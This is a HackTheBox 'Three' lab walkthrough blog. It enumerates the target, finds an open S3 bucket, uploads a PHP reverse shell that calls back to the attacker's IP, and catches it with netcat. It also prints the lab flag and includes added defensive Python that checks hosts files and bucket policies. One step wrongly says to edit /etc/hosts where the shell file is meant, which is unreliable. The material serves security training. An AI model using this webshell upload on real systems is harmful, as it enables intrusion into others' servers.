HTB Labs — Tier 1 — “Three” Machine Walkthrough | By CyberAlp0

Mohamed Maher
Mar 24, 2024
Solving “THREE” lab in the starting point phase of HackTheBox — Tier 1

The machine is built around a series of tasks that lead you step by step to the flag. This blog walks through the tasks one by one and gives a little more information and a few hints for each question. These hints will widen your experience and sharpen your mind.

The lab is named “THREE” because it covers the S3 buckets of Amazon AWS. S3 is short for “Simple Storage Service”, a public cloud storage resource available on the Amazon Web Services (AWS) platform.

Remember, learning a thing about everything is much more important than learning everything about one thing.

Step 1: Connecting to the Starting Point Labs Servers.

To attack the target machine, you have to be on the same network. You can read my Blog that will guide you step-by-step into connecting to the target machine.

Step 2: Spawning the Machine and Start Solving the Tasks.

Task 1: How Many TCP Ports are opened in the Machine?

Answer: Number of TCP Ports = 2 Ports

Walkthrough:

We can use Nmap to find how many TCP ports are open on this machine by typing the following command.

nmap 10.129.253.225
Finding all the TCP opened ports in the target machine
Note that there are some flags you can add to make this scan faster and more efficient.

Explainshell is a wonderful resource for explaining the Linux command line. You can use it as well to learn more about the different Nmap flags.

Task 2: What is the domain of the email address provided in the “Contact” section of the website?

Answer: thetoppers.htb

Walkthrough:

Visit the contact page of the website and you will see the email address “mail@thetoppers.htb”. Thus the domain of the email is “thetoppers.htb”.

The Contact Page of the target.

Task 3: In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

Answer: /etc/hosts

sudo nano /etc/hosts

Walkthrough:

A DNS server is responsible for domain name resolution. Instead of typing the IP address of each website you wish to visit, you just type the domain of the website, and DNS takes on the burden of translating the domain into an IP so that your request reaches the target server.

There are 2 types of DNS servers that can be configured on your system: a public DNS server and a local DNS server. An example of a public DNS server is Google DNS (8.8.8.8). Sometimes we add a local DNS server when it helps us reach a specific website whose domain is not registered in the public DNS servers.

The path where the system's configuration files live is /etc. Two files there relate to DNS configuration: /etc/resolv.conf and /etc/hosts.

If you want to inspect or change the DNS servers (public and local), open /etc/resolv.conf in nano. If you want to register a specific IP in the local DNS server, open /etc/hosts in nano.

Remember, you need sudo privileges to make changes to these files.

Once you finish adding the IP of the domain you want to access using nano, press Ctrl + X followed by Y to save your changes.

Mapping the domain thetoppers.htb to the IP address of the target machine in /etc/hosts

Task 4: Which sub-domain is discovered during further enumeration?

Answer: s3.thetoppers.htb

Walkthrough:

There is a difference between a domain and a subdomain. When you type https://www.google.com, the domain is just google. Subdomains are created to offer a service that is related and linked to the main domain, as in https://mail.google.com. In this case mail is the subdomain under the domain google.

You can add any number of other hostnames to /etc/hosts and point them at an IP of your choice (in this scenario, the IP of the machine).

You can discover the subdomains under the main domain (thetoppers) using tools like wfuzz, ffuf, and gobuster.

In our case, we will use gobuster to enumerate the subdomains linked to the domain “thetoppers.htb”; ffuf and wfuzz can do the same job.

The commands for each of the tools follow. Note that we fuzz the subdomains using a subdomain list provided by SecLists.

1- Gobuster

gobuster vhost -u "http://thetoppers.htb" -w /usr/share/seclists/Discovery/DNS/subdomain/subdomains-top1million-5000.txt --append-domain

2- wfuzz

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomain/subdomains-top1million-5000.txt -u "http://thetoppers.htb" -H "Host: FUZZ.thetoppers.htb" --hw 1036 -t 5

3- ffuf

ffuf -w /usr/share/seclists/Discovery/DNS/subdomain/subdomains-top1million-5000.txt -H "Host: FUZZ.thetoppers.htb" -u http://thetoppers.htb

Task 5: Which service is running on the discovered sub-domain?

Answer: amazon s3

Walkthrough:

Amazon Simple Storage Service (S3) is a storage service that offers data availability, security, and performance. Customers of all sizes can use Amazon S3 to store data and protect it from risks such as data leakage.

Read More: What is Amazon s3?

Task 6: Which command line utility can be used to interact with the service running on the discovered sub-domain?

Answer: awscli (short for: AWS Command Line Interface)

Walkthrough:

In the previous task, we learned that the service running on the subdomain is Amazon S3, which is mainly used for storing data and protecting it against cyber threats. To interact with the service running on this subdomain (s3.thetoppers.htb), you may use the command awscli.

awscli

Read More: How to configure Amazon Command Line Interface?.

Task 7: Which command is used to set up the AWS CLI installation?

Answer: aws configure

sudo apt install awscli
Installing awscli, since the command wasn’t found. Once it is configured, we will be able to connect and list all the buckets using the command aws s3 ls.

We should have installed awscli before typing the “aws configure” command. It is now being installed using the command “apt install awscli”. Just press “y” each time you are asked. Or you could have typed “apt install awscli -y” to confirm the prompts automatically.

After installing the awscli, type aws configure

aws configure
Configuring the awscli. You may configure the AWS ID, Secret Access Key, Region, and output format with anything.

After configuring the AWS, we will be able to list all the buckets as follows in the next task.

Walkthrough:

The “aws configure” command is the fastest way to set up the AWS CLI installation.

For more information: Configuring AWS CLI.

Task 8: What is the command used by the above utility to list all of the S3 buckets?

Answer: aws s3 ls

Walkthrough:

Amazon S3 (Simple Storage Service) buckets are used to store files, AKA “objects”. In the AWS cloud, these objects vary in size from a few bytes to terabytes. One of the main advantages of S3 buckets is scalability, as you can store an unlimited amount of data in an S3 bucket.

Amazon S3 (Simple Storage Service) can be pictured as a balloon: it stretches depending on how much air you fill it with. Amazon S3 is scalable in the same way and scales to meet your storage needs. You can start by storing a small amount of data, and the storage grows as you store more.

I recommend reading this blog for more information: AWS S3 Bucket.

To list all of the S3 buckets of the Amazon S3 service, type the following command along with the flag (--endpoint=URL). According to this resource, this option will help you list all of the S3 buckets.

aws s3 ls --endpoint=http://s3.thetoppers.htb s3://thetoppers.htb

You will get the following response

Listing the S3 buckets using the --endpoint option in the “aws s3 ls” command

Note: you may face the following error while connecting to the Amazon S3 servers.

Listing the s3 Buckets in the Amazon s3 Servers
Could not connect to the endpoint URL: "http://s3.thetoppers.htb/thetoppers.htb?list-type=2&prefix=&delimiter=%2F&encoding-type=url"

Connectivity Issue: Could not connect to the endpoint URL: {The URL you are trying to connect}.

Solution: To connect successfully to the AWS S3 bucket servers through s3.thetoppers.htb, modify /etc/hosts so that s3.thetoppers.htb resolves to the IP address of the machine “THREE”.

Editing /etc/hosts: adding s3.thetoppers.htb so that both the domain and the subdomain of the machine resolve to its IP address.
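
Why the subdomain needs its own entry, shown as an added example that is not part of the original walkthrough: a hosts-file lookup is an exact match, so the thetoppers.htb mapping from Task 3 does not cover s3.thetoppers.htb. Both file contents are constructed samples and the helper names are hypothetical.

```python
# Constructed sample: /etc/hosts after Task 3, before the S3 subdomain is added.
HOSTS_BEFORE = """\
127.0.0.1       localhost
# HTB "Three" target
10.129.253.225  thetoppers.htb
"""

# Constructed sample: the same file after the fix described in Task 8.
HOSTS_AFTER = """\
127.0.0.1       localhost
10.129.253.225  thetoppers.htb s3.thetoppers.htb   # both names on one line
"""


def parse_hosts(text):
    """Build {hostname: ip} from hosts-file text: '#' starts a comment,
    the first field is the address, every later field is a name for it."""
    table = {}
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2:
            continue  # blank line, comment, or an address with no name
        ip, names = fields[0], fields[1:]
        for name in names:
            # Hostnames are case-insensitive; keep the first mapping seen.
            table.setdefault(name.lower(), ip)
    return table


def resolve(text, hostname):
    """Exact-match lookup: an entry for a domain never covers its subdomains."""
    return parse_hosts(text).get(hostname.lower())


if __name__ == "__main__":
    for label, hosts in (("before", HOSTS_BEFORE), ("after", HOSTS_AFTER)):
        for name in ("thetoppers.htb", "s3.thetoppers.htb"):
            print(label, name, "->", resolve(hosts, name))
```

With the "before" file the S3 hostname has no mapping, which is the state in which the AWS CLI reports that it could not connect to the endpoint URL.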

Task 9: This server is configured to run files written in what web scripting language?

Answer: PHP

Task 10: Submitting The Root Flag of the Machine

Answer: a980d99281a28d638ac68b9bf9453c2b

Walkthrough:

Since the server is configured to run files written in PHP, we will try to upload a PHP shell to the server by connecting to the AWS S3 buckets.

We will be using the webshells command in Kali Linux in order to copy this shell into the server.

Navigating to the webshells command. It is located in /usr/share.

Webshells is an executable file that is located in a subdirectory in the path /usr/share. There are many PHP webshells; we will only be using “php-reverse-shell.php”. We will use nano to modify the IP address.

Follow the Following Steps:

Firstly: Get the IP provided to you when you are connected to HTB VPN, By typing ifconfig

The IP address assigned to kali once I am connected to VPN.

Secondly: Modify the /etc/hosts.

Replace the local IP address “127.0.0.1” with “10.10.14.63”

We replace the local IP address “127.0.0.1” with the IP address assigned to us when we connected to the VPN of the machine. We also change the port number to “8888”.

Press Ctrl + X followed by Y to save your changes

Now, you have configured the PHP shell. All you have to do is to upload this shell to the server.

Thirdly: Upload the PHP shell to the server

aws s3 --endpoint=http://s3.thetoppers.htb cp php-reverse-shell.php s3://thetoppers.htb
Uploading a reverse PHP shell to the server to connect to it using a reverse connection that will be sent from the server to our machine

Note: To make sure that the PHP shell was uploaded successfully, run the ls command.

aws s3 ls --endpoint=http://s3.thetoppers.htb s3://thetoppers.htb
Making sure that the PHP shell script was uploaded successfully to the server.

Fourthly: Listening to the Connection coming from the PHP shell

We will run netcat in order to listen to all the incoming connections coming from the PHP reverse shell on the local IP address we have configured, and through the port 8888.

nc -lnvp 8888
Running the netcat to listen to all the incoming connections configured in the PHP shell we uploaded on the server.
Connection between the web shell and the attacker machine

Fifthly: Capturing the flag of the machine

Now we have an open shell on the server, which allows us to execute commands on it. Navigating the server, we find the flag.txt file in the path /var/www.

making use of the opened shell and navigating in the server to find the flag
Navigating the directories in order to find the flag.txt

The THREE Machine flag “a980d99281a28d638ac68b9bf9453c2b”
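
The listing and the upload both worked with arbitrary values entered in aws configure, so the endpoint accepts list and write requests from any caller. On AWS itself the matching exposure is a bucket policy that lets the anonymous principal list or put objects; the following added example (not part of the original walkthrough; both policies, the bucket name and the account ID are constructed) flags such statements.

```python
import json
from fnmatch import fnmatchcase

# Actions the walkthrough relied on: listing the bucket and uploading to it.
WATCHED = ("s3:ListBucket", "s3:PutObject")

# Constructed sample: anyone may list and write (the exposure to catch).
OPEN_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*",
     "Action": ["s3:ListBucket", "s3:Put*"],
     "Resource": ["arn:aws:s3:::example-bucket",
                  "arn:aws:s3:::example-bucket/*"]}]})

# Constructed sample: public read only, writes limited to one deploy role.
LOCKED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::111122223333:role/deploy"},
     "Action": "s3:PutObject",
     "Resource": "arn:aws:s3:::example-bucket/*"}]})

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _is_anonymous(principal):
    """True for Principal "*" or {"AWS": "*"}: any caller, no identity needed."""
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return principal == "*"

def anonymous_grants(policy_json):
    """Return the WATCHED actions an unconditional Allow gives to everyone.
    NotAction, NotPrincipal and Condition statements need manual review."""
    found = set()
    for stmt in _as_list(json.loads(policy_json).get("Statement", [])):
        if stmt.get("Effect") != "Allow" or "Condition" in stmt:
            continue
        if not _is_anonymous(stmt.get("Principal")):
            continue
        for pattern in _as_list(stmt.get("Action", [])):
            # Action entries may carry wildcards such as "s3:Put*" or "*".
            found.update(w for w in WATCHED
                         if fnmatchcase(w.lower(), pattern.lower()))
    return sorted(found)

if __name__ == "__main__":
    print("open:  ", anonymous_grants(OPEN_POLICY))
    print("locked:", anonymous_grants(LOCKED_POLICY))
```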
